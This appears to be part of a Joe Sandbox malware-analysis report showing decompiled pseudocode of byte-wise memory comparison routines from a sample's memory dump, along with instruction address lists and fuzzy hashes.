                                                                                                      										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                                                                                      										if(_t278 == 0) {
                                                                                                      											L70:
                                                                                                      											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                                                                                      											if(_t280 == 0) {
                                                                                                      												L72:
                                                                                                      												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                                                                                      												if(_t282 == 0) {
                                                                                                      													L74:
                                                                                                      													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                                                                                      													if(_t231 != 0) {
                                                                                                      														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      													}
                                                                                                      													goto L77;
                                                                                                      												}
                                                                                                      												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                                                                                      												if(_t231 != 0) {
                                                                                                      													goto L1;
                                                                                                      												}
                                                                                                      												goto L74;
                                                                                                      											}
                                                                                                      											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t231 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											goto L72;
                                                                                                      										}
                                                                                                      										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t231 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L70;
                                                                                                      									}
                                                                                                      									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                                                                                      									if(_t284 == 0) {
                                                                                                      										L59:
                                                                                                      										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                                                                                      										if(_t286 == 0) {
                                                                                                      											L61:
                                                                                                      											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                                                                                      											if(_t288 == 0) {
                                                                                                      												L63:
                                                                                                      												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                                                                                      												if(_t231 != 0) {
                                                                                                      													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      												}
                                                                                                      												goto L66;
                                                                                                      											}
                                                                                                      											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t231 != 0) {
                                                                                                      												goto L1;
                                                                                                      											}
                                                                                                      											goto L63;
                                                                                                      										}
                                                                                                      										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t231 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L61;
                                                                                                      									}
                                                                                                      									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t231 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L59;
                                                                                                      								}
                                                                                                      								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                                                                                      								if(_t290 == 0) {
                                                                                                      									L48:
                                                                                                      									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                                                                                      									if(_t292 == 0) {
                                                                                                      										L50:
                                                                                                      										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                                                                                      										if(_t294 == 0) {
                                                                                                      											L52:
                                                                                                      											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                                                                                      											if(_t231 != 0) {
                                                                                                      												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      											}
                                                                                                      											goto L55;
                                                                                                      										}
                                                                                                      										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t231 != 0) {
                                                                                                      											goto L1;
                                                                                                      										}
                                                                                                      										goto L52;
                                                                                                      									}
                                                                                                      									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t231 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L50;
                                                                                                      								}
                                                                                                      								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t231 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L48;
                                                                                                      							}
                                                                                                      							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                                                                                      							if(_t296 == 0) {
                                                                                                      								L37:
                                                                                                      								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                                                                                      								if(_t298 == 0) {
                                                                                                      									L39:
                                                                                                      									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                                                                                      									if(_t300 == 0) {
                                                                                                      										L41:
                                                                                                      										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                                                                                      										if(_t231 != 0) {
                                                                                                      											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      										}
                                                                                                      										goto L44;
                                                                                                      									}
                                                                                                      									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t231 != 0) {
                                                                                                      										goto L1;
                                                                                                      									}
                                                                                                      									goto L41;
                                                                                                      								}
                                                                                                      								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t231 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L39;
                                                                                                      							}
                                                                                                      							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t231 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L37;
                                                                                                      						}
                                                                                                      						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                                                                                      						if(_t302 == 0) {
                                                                                                      							L26:
                                                                                                      							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                                                                                      							if(_t304 == 0) {
                                                                                                      								L28:
                                                                                                      								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                                                                                      								if(_t306 == 0) {
                                                                                                      									L30:
                                                                                                      									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                                                                                      									if(_t231 != 0) {
                                                                                                      										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      									}
                                                                                                      									goto L33;
                                                                                                      								}
                                                                                                      								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t231 != 0) {
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      								goto L30;
                                                                                                      							}
                                                                                                      							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t231 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L28;
                                                                                                      						}
                                                                                                      						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t231 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L26;
                                                                                                      					}
                                                                                                      					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                                                                                      					if(_t308 == 0) {
                                                                                                      						L15:
                                                                                                      						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                                                                                      						if(_t310 == 0) {
                                                                                                      							L17:
                                                                                                      							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                                                                                      							if(_t312 == 0) {
                                                                                                      								L19:
                                                                                                      								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                                                                                      								if(_t231 != 0) {
                                                                                                      									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L22;
                                                                                                      							}
                                                                                                      							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t231 != 0) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L19;
                                                                                                      						}
                                                                                                      						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                                                                      						if(_t231 != 0) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L17;
                                                                                                      					}
                                                                                                      					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                                                                      					if(_t231 != 0) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					goto L15;
                                                                                                      				} else {
                                                                                                      					__edi = __al & 0x000000ff;
                                                                                                      					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                                                                      					if(__edi == 0) {
                                                                                                      						L4:
                                                                                                      						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                                                                      						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                                                                      						if(__edi == 0) {
                                                                                                      							L6:
                                                                                                      							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                                                                                      							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                                                                      							if(__edi == 0) {
                                                                                                      								L8:
                                                                                                      								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                                                                                      								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                                                                                      								if(__ecx != 0) {
                                                                                                      									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                                                                      								}
                                                                                                      								goto L11;
                                                                                                      							}
                                                                                                      							0 = 0 | __edi > 0x00000000;
                                                                                                      							__ecx = (__edi > 0) * 2 != 1;
                                                                                                      							if((__edi > 0) * 2 != 1) {
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      							goto L8;
                                                                                                      						}
                                                                                                      						0 = 0 | __edi > 0x00000000;
                                                                                                      						__ecx = (__edi > 0) * 2 != 1;
                                                                                                      						if((__edi > 0) * 2 != 1) {
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      						goto L6;
                                                                                                      					}
                                                                                                      					0 = 0 | __edi > 0x00000000;
                                                                                                      					__ecx = (__edi > 0) * 2 != 1;
                                                                                                      					if((__edi > 0) * 2 != 1) {
                                                                                                      						goto L1;
                                                                                                      					}
                                                                                                      					goto L4;
                                                                                                      				}
                                                                                                      				L1:
                                                                                                      				_t184 = _t231;
                                                                                                      				return _t184;
                                                                                                      			}






























                                                                                                      0x004164e4
                                                                                                      0x004164e4
                                                                                                      0x004164ea
                                                                                                      0x00416561
                                                                                                      0x00416563
                                                                                                      0x00416565
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041656b
                                                                                                      0x00416571
                                                                                                      0x004165f8
                                                                                                      0x004165fa
                                                                                                      0x004165fc
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416602
                                                                                                      0x00416608
                                                                                                      0x0041668f
                                                                                                      0x00416691
                                                                                                      0x00416693
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416699
                                                                                                      0x0041669f
                                                                                                      0x00416726
                                                                                                      0x00416728
                                                                                                      0x0041672a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416730
                                                                                                      0x00416736
                                                                                                      0x004167bd
                                                                                                      0x004167bf
                                                                                                      0x004167c1
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004167cd
                                                                                                      0x00416855
                                                                                                      0x00416857
                                                                                                      0x00416859
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041685f
                                                                                                      0x00416865
                                                                                                      0x004168ec
                                                                                                      0x004168ee
                                                                                                      0x004168f0
                                                                                                      0x004168fe
                                                                                                      0x00416900
                                                                                                      0x0041690d
                                                                                                      0x0041690d
                                                                                                      0x00416900
                                                                                                      0x00000000
                                                                                                      0x004168f0
                                                                                                      0x00416872
                                                                                                      0x00416874
                                                                                                      0x0041688c
                                                                                                      0x00416894
                                                                                                      0x00416896
                                                                                                      0x004168ae
                                                                                                      0x004168b6
                                                                                                      0x004168b8
                                                                                                      0x004168d0
                                                                                                      0x004168d8
                                                                                                      0x004168da
                                                                                                      0x004168e3
                                                                                                      0x004168e3
                                                                                                      0x00000000
                                                                                                      0x004168da
                                                                                                      0x004168c1
                                                                                                      0x004168ca
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004168ca
                                                                                                      0x0041689f
                                                                                                      0x004168a8
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004168a8
                                                                                                      0x0041687d
                                                                                                      0x00416886
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416886
                                                                                                      0x004167db
                                                                                                      0x004167dd
                                                                                                      0x004167f5
                                                                                                      0x004167fd
                                                                                                      0x004167ff
                                                                                                      0x00416817
                                                                                                      0x0041681f
                                                                                                      0x00416821
                                                                                                      0x00416839
                                                                                                      0x00416841
                                                                                                      0x00416843
                                                                                                      0x0041684c
                                                                                                      0x0041684c
                                                                                                      0x00000000
                                                                                                      0x00416843
                                                                                                      0x0041682a
                                                                                                      0x00416833
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416833
                                                                                                      0x00416808
                                                                                                      0x00416811
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416811
                                                                                                      0x004167e6
                                                                                                      0x004167ef
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004167ef
                                                                                                      0x00416743
                                                                                                      0x00416745
                                                                                                      0x0041675d
                                                                                                      0x00416765
                                                                                                      0x00416767
                                                                                                      0x0041677f
                                                                                                      0x00416787
                                                                                                      0x00416789
                                                                                                      0x004167a1
                                                                                                      0x004167a9
                                                                                                      0x004167ab
                                                                                                      0x004167b4
                                                                                                      0x004167b4
                                                                                                      0x00000000
                                                                                                      0x004167ab
                                                                                                      0x00416792
                                                                                                      0x0041679b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041679b
                                                                                                      0x00416770
                                                                                                      0x00416779
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416779
                                                                                                      0x0041674e
                                                                                                      0x00416757
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416757
                                                                                                      0x004166ac
                                                                                                      0x004166ae
                                                                                                      0x004166c6
                                                                                                      0x004166ce
                                                                                                      0x004166d0
                                                                                                      0x004166e8
                                                                                                      0x004166f0
                                                                                                      0x004166f2
                                                                                                      0x0041670a
                                                                                                      0x00416712
                                                                                                      0x00416714
                                                                                                      0x0041671d
                                                                                                      0x0041671d
                                                                                                      0x00000000
                                                                                                      0x00416714
                                                                                                      0x004166fb
                                                                                                      0x00416704
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416704
                                                                                                      0x004166d9
                                                                                                      0x004166e2
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004166e2
                                                                                                      0x004166b7
                                                                                                      0x004166c0
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004166c0
                                                                                                      0x00416615
                                                                                                      0x00416617
                                                                                                      0x0041662f
                                                                                                      0x00416637
                                                                                                      0x00416639
                                                                                                      0x00416651
                                                                                                      0x00416659
                                                                                                      0x0041665b
                                                                                                      0x00416673
                                                                                                      0x0041667b
                                                                                                      0x0041667d
                                                                                                      0x00416686
                                                                                                      0x00416686
                                                                                                      0x00000000
                                                                                                      0x0041667d
                                                                                                      0x00416664
                                                                                                      0x0041666d
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041666d
                                                                                                      0x00416642
                                                                                                      0x0041664b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0041664b
                                                                                                      0x00416620
                                                                                                      0x00416629
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416629
                                                                                                      0x0041657e
                                                                                                      0x00416580
                                                                                                      0x00416598
                                                                                                      0x004165a0
                                                                                                      0x004165a2
                                                                                                      0x004165ba
                                                                                                      0x004165c2
                                                                                                      0x004165c4
                                                                                                      0x004165dc
                                                                                                      0x004165e4
                                                                                                      0x004165e6
                                                                                                      0x004165ef
                                                                                                      0x004165ef
                                                                                                      0x00000000
                                                                                                      0x004165e6
                                                                                                      0x004165cd
                                                                                                      0x004165d6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004165d6
                                                                                                      0x004165ab
                                                                                                      0x004165b4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004165b4
                                                                                                      0x00416589
                                                                                                      0x00416592
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004164ec
                                                                                                      0x004164ec
                                                                                                      0x004164f3
                                                                                                      0x004164f5
                                                                                                      0x00416509
                                                                                                      0x00416509
                                                                                                      0x00416511
                                                                                                      0x00416513
                                                                                                      0x00416527
                                                                                                      0x00416527
                                                                                                      0x0041652f
                                                                                                      0x00416531
                                                                                                      0x00416545
                                                                                                      0x00416545
                                                                                                      0x0041654d
                                                                                                      0x0041654f
                                                                                                      0x00416558
                                                                                                      0x00416558
                                                                                                      0x00000000
                                                                                                      0x0041654f
                                                                                                      0x00416537
                                                                                                      0x0041653a
                                                                                                      0x00416543
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416543
                                                                                                      0x00416519
                                                                                                      0x0041651c
                                                                                                      0x00416525
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416525
                                                                                                      0x004164fb
                                                                                                      0x004164fe
                                                                                                      0x00416507
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00416507
                                                                                                      0x004164dc
                                                                                                      0x004164dc
                                                                                                      0x004172cd

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                      • Instruction ID: b7878d0f221b722cf0e3b3427d077349876609862440d8d5cd2c1f99f660dafc
                                                                                                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                      • Instruction Fuzzy Hash: 21C184322051A30DDF2D463984740BFBBA55AA27B131B07AFD4B7CB2C5EE18C5A5D62C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E004160CC(void* __edx, void* __esi) {
                                                                                                      				signed char _t177;
                                                                                                      				void* _t178;
                                                                                                      				signed char _t179;
                                                                                                      				signed char _t180;
                                                                                                      				signed char _t181;
                                                                                                      				signed char _t183;
                                                                                                      				signed char _t184;
                                                                                                      				void* _t228;
                                                                                                      				void* _t278;
                                                                                                      				void* _t281;
                                                                                                      				void* _t283;
                                                                                                      				void* _t285;
                                                                                                      				void* _t287;
                                                                                                      				void* _t289;
                                                                                                      				void* _t291;
                                                                                                      				void* _t293;
                                                                                                      				void* _t295;
                                                                                                      				void* _t297;
                                                                                                      				void* _t299;
                                                                                                      				void* _t301;
                                                                                                      				void* _t303;
                                                                                                      				void* _t305;
                                                                                                      				void* _t307;
                                                                                                      				void* _t309;
                                                                                                      				void* _t311;
                                                                                                      				void* _t313;
                                                                                                      				void* _t315;
                                                                                                      				void* _t317;
                                                                                                      				void* _t319;
                                                                                                      				void* _t321;
                                                                                                      				void* _t322;
                                                                                                      
                                                                                                      				_t322 = __esi;
                                                                                                      				_t278 = __edx;
                                                                                                      				_t177 =  *(__esi - 0x1c);
                                                                                                      				if(_t177 ==  *(__edx - 0x1c)) {
                                                                                                      					_t228 = 0;
                                                                                                      					L10:
                                                                                                      					if(_t228 != 0) {
                                                                                                      						L78:
                                                                                                      						_t178 = _t228;
                                                                                                      						return _t178;
                                                                                                      					}
                                                                                                      					_t179 =  *(_t322 - 0x18);
                                                                                                      					if(_t179 ==  *(_t278 - 0x18)) {
                                                                                                      						_t228 = 0;
                                                                                                      						L21:
                                                                                                      						if(_t228 != 0) {
                                                                                                      							goto L78;
                                                                                                      						}
                                                                                                      						_t180 =  *(_t322 - 0x14);
                                                                                                      						if(_t180 ==  *(_t278 - 0x14)) {
                                                                                                      							_t228 = 0;
                                                                                                      							L32:
                                                                                                      							if(_t228 != 0) {
                                                                                                      								goto L78;
                                                                                                      							}
                                                                                                      							_t181 =  *(_t322 - 0x10);
                                                                                                      							if(_t181 ==  *(_t278 - 0x10)) {
                                                                                                      								_t228 = 0;
                                                                                                      								L43:
                                                                                                      								if(_t228 != 0) {
                                                                                                      									goto L78;
                                                                                                      								}
                                                                                                      								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                                                                                      									_t228 = 0;
                                                                                                      									L54:
                                                                                                      									if(_t228 != 0) {
                                                                                                      										goto L78;
                                                                                                      									}
                                                                                                      									_t183 =  *(_t322 - 8);
                                                                                                      									if(_t183 ==  *(_t278 - 8)) {
                                                                                                      										_t228 = 0;
                                                                                                      										L65:
                                                                                                      										if(_t228 != 0) {
                                                                                                      											goto L78;
                                                                                                      										}
                                                                                                      										_t184 =  *(_t322 - 4);
                                                                                                      										if(_t184 ==  *(_t278 - 4)) {
                                                                                                      											_t228 = 0;
                                                                                                      											L76:
                                                                                                      											if(_t228 == 0) {
                                                                                                      												_t228 = 0;
                                                                                                      											}
                                                                                                      											goto L78;
                                                                                                      										}
                                                                                                      										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                                                                                      										if(_t281 == 0) {
                                                                                                      											L69:
                                                                                                      											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                                                                                      											if(_t283 == 0) {
                                                                                                      												L71:
                                                                                                      												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                                                                                      												if(_t285 == 0) {
                                                                                                      													L73:
                                                                                                      													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                                                                                      													if(_t228 != 0) {
                                                                                                      														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      													}
                                                                                                      													goto L76;
                                                                                                      												}
                                                                                                      												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                                                                                      												if(_t228 != 0) {
                                                                                                      													goto L78;
                                                                                                      												}
                                                                                                      												goto L73;
                                                                                                      											}
                                                                                                      											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t228 != 0) {
                                                                                                      												goto L78;
                                                                                                      											}
                                                                                                      											goto L71;
                                                                                                      										}
                                                                                                      										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t228 != 0) {
                                                                                                      											goto L78;
                                                                                                      										}
                                                                                                      										goto L69;
                                                                                                      									}
                                                                                                      									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                                                                                      									if(_t287 == 0) {
                                                                                                      										L58:
                                                                                                      										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                                                                                      										if(_t289 == 0) {
                                                                                                      											L60:
                                                                                                      											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                                                                                      											if(_t291 == 0) {
                                                                                                      												L62:
                                                                                                      												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                                                                                      												if(_t228 != 0) {
                                                                                                      													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      												}
                                                                                                      												goto L65;
                                                                                                      											}
                                                                                                      											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                                                                                      											if(_t228 != 0) {
                                                                                                      												goto L78;
                                                                                                      											}
                                                                                                      											goto L62;
                                                                                                      										}
                                                                                                      										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t228 != 0) {
                                                                                                      											goto L78;
                                                                                                      										}
                                                                                                      										goto L60;
                                                                                                      									}
                                                                                                      									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t228 != 0) {
                                                                                                      										goto L78;
                                                                                                      									}
                                                                                                      									goto L58;
                                                                                                      								}
                                                                                                      								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                                                                                      								if(_t293 == 0) {
                                                                                                      									L47:
                                                                                                      									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                                                                                      									if(_t295 == 0) {
                                                                                                      										L49:
                                                                                                      										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                                                                                      										if(_t297 == 0) {
                                                                                                      											L51:
                                                                                                      											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                                                                                      											if(_t228 != 0) {
                                                                                                      												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      											}
                                                                                                      											goto L54;
                                                                                                      										}
                                                                                                      										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                                                                      										if(_t228 != 0) {
                                                                                                      											goto L78;
                                                                                                      										}
                                                                                                      										goto L51;
                                                                                                      									}
                                                                                                      									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t228 != 0) {
                                                                                                      										goto L78;
                                                                                                      									}
                                                                                                      									goto L49;
                                                                                                      								}
                                                                                                      								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t228 != 0) {
                                                                                                      									goto L78;
                                                                                                      								}
                                                                                                      								goto L47;
                                                                                                      							}
                                                                                                      							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                                                                                      							if(_t299 == 0) {
                                                                                                      								L36:
                                                                                                      								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                                                                                      								if(_t301 == 0) {
                                                                                                      									L38:
                                                                                                      									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                                                                                      									if(_t303 == 0) {
                                                                                                      										L40:
                                                                                                      										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                                                                                      										if(_t228 != 0) {
                                                                                                      											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      										}
                                                                                                      										goto L43;
                                                                                                      									}
                                                                                                      									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                                                                      									if(_t228 != 0) {
                                                                                                      										goto L78;
                                                                                                      									}
                                                                                                      									goto L40;
                                                                                                      								}
                                                                                                      								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                                                                      								if(_t228 != 0) {
                                                                                                      									goto L78;
                                                                                                      								}
                                                                                                      								goto L38;
                                                                                                      							}
                                                                                                      							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                                                                      							if(_t228 != 0) {
                                                                                                      								goto L78;
                                                                                                      							}
                                                                                                      							goto L36;
                                                                                                      						}
                                                                                                      						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                                                                                      						if(_t305 == 0) {
                                                                                                      							L25:
                                                                                                      							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                                                                                      							if(_t307 == 0) {
                                                                                                      								L27:
                                                                                                      								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                                                                                      								if(_t309 == 0) {
                                                                                                      									L29:
                                                                                                      									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                                                                                      									if(_t228 != 0) {
                                                                                                      										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                                                                                      									}
                                                                                                      									goto L32;
                                                                                                      								}
